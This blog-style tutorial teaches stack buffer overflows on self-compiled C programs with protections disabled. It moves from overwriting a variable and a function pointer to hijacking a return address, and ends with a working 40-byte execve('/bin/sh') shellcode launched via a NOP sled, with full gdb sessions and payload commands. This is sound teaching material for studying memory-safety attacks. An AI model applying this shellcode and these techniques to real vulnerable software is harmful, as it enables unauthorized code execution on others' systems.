Buffer Overflows


A buffer overflow is a type of security vulnerability that could be used to execute malicious code. Learn how it works in this blog post.

Variable overwriting

In its simplest form, a buffer overflow overwrites parts of memory that, from a security and safety perspective, the code should not have access to. Consider, for example, this small C program, which has an otherwise unused integer a and copies the first command line argument into the buf array:

#include <stdio.h>  // printf
#include <string.h> // strcpy
int main(int argc, char *argv[]) {
  int a=0;
  char buf[5];
  strcpy(buf, argv[1]);
  printf (a!=0?"overwritten\n":"unchanged\n");
}

The integer a is initialized on the stack with value 0, after which a char array of size 5 is allocated on the stack. Because strcpy copies until it reaches the terminating NUL byte of its source, without checking the size of the destination, a long enough input writes past the end of buf and overwrites the integer value on the stack. The printf call shows whether this succeeded.

Compiling this with gcc -o buf buf.c and trying to overflow the buffer with the input “AAAAAA”, the program crashes with an error message:

$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
unchanged
*** stack smashing detected ***: terminated
Aborted (core dumped)

The program was compiled by gcc to detect buffer overflows like this. It does so by placing “canaries” (named after the canaries used to detect poisonous gas in coal mines), i.e., random values, on the stack between the local arrays and the control data behind them (such as the return address), and having the binary check that they remain unchanged. Although this is a brilliant security measure, for educational purposes we turn this compiler feature off by invoking gcc with the flag -fno-stack-protector.
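The canary check can be imitated in plain C. The following is only a sketch on a simulated frame, not what gcc actually emits: the layout (5 buffer bytes directly followed by an 8-byte canary) and the names frame_t and write_and_check are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { BUF_SIZE = 5, CANARY_SIZE = 8, FRAME_SIZE = BUF_SIZE + CANARY_SIZE };

/* Simulated stack frame: BUF_SIZE bytes of buffer followed directly by
 * the canary. This layout is an assumption made for illustration. */
typedef struct {
  unsigned char bytes[FRAME_SIZE];
} frame_t;

/* Writes len bytes at the start of the frame without checking len against
 * BUF_SIZE (as strcpy would), then reports whether the canary survived.
 * Returns 1 if the canary is intact and 0 if it was overwritten. */
int write_and_check(frame_t *frame, const void *data, size_t len,
                    uint64_t canary) {
  assert(frame != NULL && data != NULL);
  assert(len <= FRAME_SIZE); /* keep the simulation itself in bounds */

  memcpy(frame->bytes + BUF_SIZE, &canary, CANARY_SIZE); /* on entry */
  memcpy(frame->bytes, data, len);                       /* unchecked copy */

  uint64_t seen;
  memcpy(&seen, frame->bytes + BUF_SIZE, CANARY_SIZE);   /* on exit */
  return seen == canary;
}
```

Calling write_and_check with the 5 bytes of "AAAA" (including its NUL) leaves the canary intact, while the 7 bytes of "AAAAAA" spill into it, which is the situation in which the real binary aborts.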

$ gcc -o buf buf.c -fno-stack-protector
$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
overwritten
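Why does AAAAA leave a unchanged while AAAAAA does not? A possible explanation can be sketched on a simulated frame, assuming that a sits directly behind the 5 bytes of buf. That layout matches the transcript above but is ultimately up to the compiler, and the name simulate_overwrite is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum { BUF_SIZE = 5 };

/* Replays main() from the example on a modelled frame in which the int
 * directly follows the 5-byte buffer (an assumed layout). Returns the
 * value of the simulated variable a after the unchecked copy. */
int simulate_overwrite(const char *input) {
  unsigned char frame[BUF_SIZE + sizeof(int)];
  assert(input != NULL);

  size_t n = strlen(input) + 1; /* strcpy also copies the NUL byte */
  assert(n <= sizeof frame);    /* keep the simulation itself in bounds */

  int a = 0;
  memcpy(frame + BUF_SIZE, &a, sizeof a); /* int a = 0; */
  memcpy(frame, input, n);                /* strcpy(buf, argv[1]); */
  memcpy(&a, frame + BUF_SIZE, sizeof a); /* read a back */
  return a;
}
```

Under this assumption, five A’s already overflow buf by one byte, but that byte is the terminating NUL and it lands on a byte of a that was zero anyway. With six A’s, a non-zero byte reaches a.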

Pointer overwriting

As an attacker, it is more interesting to be able to execute code than to just overwrite some value. For now, let’s use a function that we define and compile ourselves:

#include<stdio.h>  //printf
#include<string.h> //strcpy
void malicious() {
  printf("malicious procedure\n");
}
void normal() {
  printf("normal procedure\n");
}
int main(int argc, char *argv[]) {
  void (*fun) () = normal;
  char buf[5];
  strcpy(buf,argv[1]);
  fun();
}

In the main function, the pointer fun points to the function normal and is executed at the end. The pointer is pushed to the stack before the char array buf. This allows us to overwrite the function pointer with the address of our malicious code. To find this address, we will use gdb:

$ gcc -o fun fun.c -fno-stack-protector
$ gdb fun
...
(gdb) run AAAA
normal procedure
[Inferior 1 (process 561710) exited normally]
(gdb) info function malicious
Non-debugging symbols:
0x0000555555555149  malicious

This address 0x0000555555555149, obtained by querying gdb with info function malicious, is the entry point of our malicious function. The leading 0x indicates a hexadecimal value. Every pair of hexadecimal digits represents one byte. We can convert this address into ASCII characters that we can input to overflow the buf array and overwrite the function pointer with the address we want:

echo -n 0000555555555149 | xxd -r -p | od -c

Or use an online tool such as this one. The resulting ASCII string is ^@^@UUUUQI, where ^@ denotes the NUL character. Copy or type in the obtained ASCII string and input it in your program. The NUL character can be obtained by drawing two NUL bytes from /dev/zero using head or dd:

(gdb) run $(echo "AAAAA$(head -c 2 /dev/zero)UUUUQI")
malicious procedure
(gdb) run $(echo "AAAAA$(dd if=/dev/zero bs=1 count=2)UUUUQI")
malicious procedure

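If you get a segmentation fault and you don’t see the message “malicious procedure”, then you are probably working on a little-endian machine, and you should input the bytes of the address in reverse order. The NUL bytes cannot actually be passed along here: bash drops them from a command substitution, and a C string ends at its first NUL byte anyway. The overwrite still works because strcpy appends one NUL byte itself and the most significant byte of the original pointer is already zero: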

(gdb) run $(echo "AAAAAIQUUUU$(head -c 2 /dev/zero)")
malicious procedure
(gdb) run $(echo "AAAAAIQUUUU$(dd if=/dev/zero bs=1 count=2)")
malicious procedure

Congrats! You have successfully executed “malicious code” by use of an overflow.
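The byte-order conversion used in this section can also be written down in C. This is a minimal sketch with a hypothetical helper name, encode_le64; it assumes a 64-bit address and a little-endian target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores addr in out[0..7] in little-endian order (least significant byte
 * first). Returns the number of bytes before the first zero byte, i.e. how
 * many of them fit inside a NUL-terminated command line argument. */
size_t encode_le64(uint64_t addr, unsigned char out[8]) {
  assert(out != NULL);
  size_t usable = 0;
  int seen_zero = 0;
  for (size_t i = 0; i < 8; i++) {
    out[i] = (unsigned char)(addr >> (8 * i));
    if (out[i] == 0) {
      seen_zero = 1;
    }
    if (!seen_zero) {
      usable++;
    }
  }
  return usable;
}
```

For the address 0x0000555555555149 reported by gdb above, the first six bytes are printable ASCII characters and the last two are zero, so only six bytes need to be (and can be) passed on the command line.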

Overwriting Return Addresses

The function pointer fun that pointed to the normal procedure was pushed to the stack of the main function because we declared it ourselves. But we do not have to create a function pointer ourselves to execute our malicious function. When a function is called, a stack frame is created. Before the function is executed, a return address is pushed to the stack. This return address is a way for the processing unit to remember where to continue execution of the program after the function is finished.

Consider the following program:

#include<stdio.h>  // printf
#include<stdlib.h> // exit
#include<string.h> // strcpy

void malicious() {
  printf("malicious procedure\n");
  exit(0);
}
void normal() {
  printf("normal procedure\n");
}
void foo(char *src) {
  char buf[100];
  strcpy(buf,src);
  printf("%s\n",buf);
}
int main(int argc, char *argv[]) {
  foo(argv[1]);
  normal();
}

First, foo is executed. If buf is not overflowed, then after foo is finished the processor will continue execution where it left off in the main function and proceed to execute the function normal. However, we can overflow buf to overwrite the return address in the stack frame of foo, so that execution continues at an address we choose. To find the right length, we just try a couple of lengths for our input strings of repeating A’s, starting from 100. The number of A’s needed to reach the return address may differ per machine or compiler; in my case, the A’s started appearing in the return address after length 120 (the hexadecimal value of the character ‘A’ is 41):

$ gcc -o ret ret.c -fno-stack-protector
$ gdb ret
(gdb) run $(head -c 120 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe538 in ?? ()
(gdb) run $(head -c 123 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()
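Instead of trying lengths one by one, a common alternative (a different technique from the trial and error used above) is to feed the program a non-repeating pattern and look up the bytes that end up in the faulting address. The sketch below uses hypothetical helper names, pattern_create and pattern_offset, and a pattern in which any 4 consecutive bytes are unique for inputs of up to a few hundred bytes. On a little-endian machine, the bytes gdb shows in the address are in reverse order and must be flipped before the lookup.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Fills out[0..n-1] with the sequence Aa0Aa1Aa2...Ab0Ab1... (no NUL is
 * appended). Assumes an ASCII-compatible character set. */
void pattern_create(char *out, size_t n) {
  assert(out != NULL);
  for (size_t i = 0; i < n; i++) {
    size_t group = i / 3; /* index of the 3-character group */
    switch (i % 3) {
      case 0:  out[i] = (char)('A' + (group / 260) % 26); break;
      case 1:  out[i] = (char)('a' + (group / 10) % 26);  break;
      default: out[i] = (char)('0' + group % 10);         break;
    }
  }
}

/* Returns the offset of the first occurrence of the 4 bytes in needle
 * within pattern[0..n-1], or -1 if they do not occur. */
long pattern_offset(const char *pattern, size_t n, const char needle[4]) {
  assert(pattern != NULL && needle != NULL);
  for (size_t i = 0; i + 4 <= n; i++) {
    if (memcmp(pattern + i, needle, 4) == 0) {
      return (long)i;
    }
  }
  return -1;
}
```

Running the program once with such a pattern and passing the observed bytes to pattern_offset gives the distance to the return address in a single attempt.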

So our attack plan is to put 120 A’s into the buffer, followed by the address of the function malicious:

(gdb) info function malicious
All functions matching regular expression "malicious":

Non-debugging symbols:
0x0000555555555159  malicious
(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo -n 0000555555555159 | xxd -r -p)")
/bin/bash: line 1: warning: command substitution: ignored null byte in input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYQUUUU
malicious procedure
[Inferior 1 (process 666246) exited normally]

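Remember that the address bytes need to be reversed on little-endian machines, which is the version that produced the output above (note the YQUUUU at the end of the echoed string):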

(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo -n 0000555555555159 | xxd -r -p | rev)")

It’s funny how gdb reports successful termination. This is because we deceitfully ended our malicious function with exit(0).
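The input string used in this section can also be assembled in C rather than in the shell. This is a rough sketch for a little-endian machine; the helper name build_payload is hypothetical, and the padding length of 120 is the value found on my machine, not a constant.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes pad_len filler bytes, followed by the low bytes of addr in
 * little-endian order up to (not including) its first zero byte, followed
 * by a terminating NUL. out must have room for pad_len + 9 bytes.
 * Returns the length of the resulting string. */
size_t build_payload(char *out, size_t pad_len, uint64_t addr) {
  assert(out != NULL);
  memset(out, 'A', pad_len);
  size_t len = pad_len;

  /* A command line argument ends at its first NUL byte, so stop there. */
  for (int i = 0; i < 8; i++) {
    unsigned char byte = (unsigned char)(addr >> (8 * i));
    if (byte == 0) {
      break;
    }
    out[len++] = (char)byte;
  }
  out[len] = '\0';
  return len;
}
```

With pad_len 120 and the address 0x0000555555555159, the result is 120 A’s followed by YQUUUU, the same string that is echoed in the gdb session above.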

Opening a Linux 64-bit Shell

Instead of having to compile a malicious function, we could fill the buffer with binary code that performs the same function. For example, we could fill the buffer with code that opens a shell for us. From this cool blog post, binary/assembly code that opens a shell on a Linux 64-bit machine is given by this hexadecimal string:

6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05

This piece of assembly makes a system call to execve with the string /bin/sh, which should open a shell for us. So how do we execute this with a buffer overflow? Consider the following program, which, like before, simply echoes back the first command line argument without properly checking its length:

#include <stdio.h>
#include <string.h>

void foo(char *src) {
  char buf[100];
  strcpy(buf,src);
  printf ("%s\n",buf);
}
int main(int argc, char *argv[]) {
  foo(argv[1]);
}

Like before, we have to find the return address in the stack frame of the function foo. This time, however, we don’t point to some other function, but we point inside the buffer, where we also put our assembly code that opens a shell. Using gdb, I find again that the return address is overwritten once we get past a string of As of length 120.

Our buffer overflow string will thus be of length 128 and look as follows:

  • 60 bytes containing the hex value 90;
  • 40 bytes containing the assembly for opening a shell;
  • 20 bytes of random data; and
  • 8 bytes with the address at which we wish to continue execution.

The first 60 bytes could be random too, but there is a good reason for picking hex value 90. If it is random data, we have to provide the 8 byte address pointing exactly to where our assembly code starts. But now we can point anywhere within the range of the 60 bytes of 0x90, because 0x90 is the NOP code (no operation), telling the processing unit to just skip to the next instruction. This initial range of NOP instructions is called the NOP sled.
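The 60 + 40 + 20 + 8 layout can be written down as a small C routine. This is only a sketch of the layout under the sizes listed above: the name build_sled_payload and the target parameter are hypothetical, and a little-endian machine is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
  SLED_LEN = 60,  /* NOP bytes (0x90) */
  CODE_LEN = 40,  /* code that opens the shell */
  FILL_LEN = 20,  /* arbitrary filler up to the return address */
  ADDR_LEN = 8,   /* address to continue execution at */
  PAYLOAD_LEN = SLED_LEN + CODE_LEN + FILL_LEN + ADDR_LEN
};

/* Fills out[0..PAYLOAD_LEN-1] with the NOP sled, the code, the filler, and
 * the target address in little-endian order. */
void build_sled_payload(unsigned char out[PAYLOAD_LEN],
                        const unsigned char code[CODE_LEN],
                        uint64_t target) {
  assert(out != NULL && code != NULL);
  unsigned char *p = out;

  memset(p, 0x90, SLED_LEN);
  p += SLED_LEN;
  memcpy(p, code, CODE_LEN);
  p += CODE_LEN;
  memset(p, 'A', FILL_LEN);
  p += FILL_LEN;
  for (int i = 0; i < ADDR_LEN; i++) {
    p[i] = (unsigned char)(target >> (8 * i));
  }
}
```

Any target that falls within the first 60 bytes of the buffer works equally well, which is the point of the sled.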

First, we compile the program with the gcc flag -zexecstack, which allows the program to execute code on the stack.

$ gcc -o asm asm.c -fno-stack-protector -zexecstack

Next, we confirm where the return address starts (in my case, at offset 60+40+20=120):

$ gdb asm
...
(gdb) run $(printf "\x90%.0s" {1..60})$(echo -n 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 | xxd -r -p)$(printf "A%.0s" {1..23})
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()

Here, I use printf "\x90%.0s" {1..60} to generate 60 NOP bytes. This is followed by the 40 bytes of code opening a shell, and finally, 23 As. We can see that 3 As appear in the return address. To figure out which address to write over the return address, we use the x command in gdb to find the NOP sled. We look at 100 four-byte words (x/100x), starting 200 bytes below the stack pointer $rsp:

(gdb) x/100x $rsp-200
0x7fffffffe2a8:	0xffffe4a8	0x00007fff	0x00000002	0x00000000
0x7fffffffe2b8:	0x00000000	0x00000000	0xf7ffd000	0x00007fff
0x7fffffffe2c8:	0x55557dd8	0x00005555	0xffffe360	0x00007fff
0x7fffffffe2d8:	0x55555174	0x00005555	0x004a0000	0x00000000
0x7fffffffe2e8:	0xffffe7f5	0x00007fff	0x90909090	0x90909090
0x7fffffffe2f8:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe308:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe318:	0x90909090	0x90909090	0x90909090	0x90909090
0x7fffffffe328:	0x90909090	0x48583b6a	0xb849d231	0x69622f2f
0x7fffffffe338:	0x68732f6e	0x08e8c149	0x89485041	0x485752e7
0x7fffffffe348:	0x050fe689	0x48583c6a	0x050fff31	0x41414141
0x7fffffffe358:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe368:	0x00414141	0x00005555	0xffffe4a8	0x00007fff
0x7fffffffe378:	0xffffe4a8	0x00000002	0xffffe420	0x00007fff
0x7fffffffe388:	0xf7dae488	0x00007fff	0xffffe3d0	0x00007fff
0x7fffffffe398:	0xffffe4a8	0x00007fff	0x55554040	0x00000002
0x7fffffffe3a8:	0x55555177	0x00005555	0xffffe4a8	0x00007fff
0x7fffffffe3b8:	0xafc58c2c	0xf6337170	0x00000002	0x00000000
0x7fffffffe3c8:	0x00000000	0x00000000	0xf7ffd000	0x00007fff
0x7fffffffe3d8:	0x55557dd8	0x00005555	0xa0a58c2c	0xf6337170
0x7fffffffe3e8:	0xaffb8c2c	0xf633613a	0x00000000	0x00007fff
0x7fffffffe3f8:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe408:	0x00000002	0x00000000	0xffffe4a0	0x00007fff
0x7fffffffe418:	0xa74d6e00	0xa0240718	0xffffe480	0x00007fff
0x7fffffffe428:	0xf7dae54c	0x00007fff	0xffffe4c0	0x00007fff

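The NOP sled runs from 0x7fffffffe2f0 (the third word on the line starting at e2e8) through 0x7fffffffe32b (the first word on the line starting at e328). Let’s pick 0x7fffffffe318 as the address from which execution slides into our shell-opening code (I’m on a little-endian machine, so I use the reversed byte order).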
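Whether a chosen address really lands in the sled is a simple range check. In the dump above, the first 0x90909090 word is the third word on the line starting at 0x7fffffffe2e8, so the sled begins at 0x7fffffffe2f0 and is 60 bytes long. The helper name lands_in_sled is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if target lies inside the NOP sled that starts at sled_start
 * and is sled_len bytes long, and 0 otherwise. */
int lands_in_sled(uint64_t target, uint64_t sled_start, uint64_t sled_len) {
  assert(sled_len > 0);
  return target >= sled_start && target - sled_start < sled_len;
}
```

For example, lands_in_sled(0x7fffffffe318, 0x7fffffffe2f0, 60) returns 1, while 0x7fffffffe32c, the first byte of the shell-opening code, is already outside the sled.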

(gdb) run $(printf "\x90%.0s" {1..60})$(echo -n 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 | xxd -r -p)$(printf "A%.0s" {1..20})$(echo -n 18e3ffffff7f | xxd -r -p)
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAA�
sh-5.2$

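That’s it! A shell opened! Notice again that if we exit the shell, gdb reports a normal exit. This time the reason is that execve replaced the running program with the shell, so gdb sees the shell’s own exit status; the exit(0) system call at the end of the 40-byte assembly code only runs if execve fails.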
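In C terms, the 40 bytes used above correspond roughly to execve("/bin/sh", argv, NULL) followed by exit(0), as far as the byte sequence can be read. The sketch below shows the same system call from C on Linux. The helper name run_shell is hypothetical, and the fork and the -c argument are additions (not part of the byte sequence) so that the call can be tried non-interactively.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs command in /bin/sh via execve in a child process and returns the
 * shell's exit status, or -1 if the child could not be started or did not
 * exit normally. */
int run_shell(const char *command) {
  assert(command != NULL);

  pid_t pid = fork();
  if (pid < 0) {
    return -1;
  }
  if (pid == 0) {
    /* Child: replace the process image with the shell. Linux accepts a
     * NULL environment pointer, like the byte sequence passes. */
    char *const argv[] = {"/bin/sh", "-c", (char *)command, NULL};
    execve("/bin/sh", argv, NULL);
    _exit(127); /* only reached if execve failed */
  }

  int status = 0;
  if (waitpid(pid, &status, 0) < 0) {
    return -1;
  }
  return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because execve does not return on success, the code after it runs only on failure, just like the trailing exit system call in the byte sequence.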

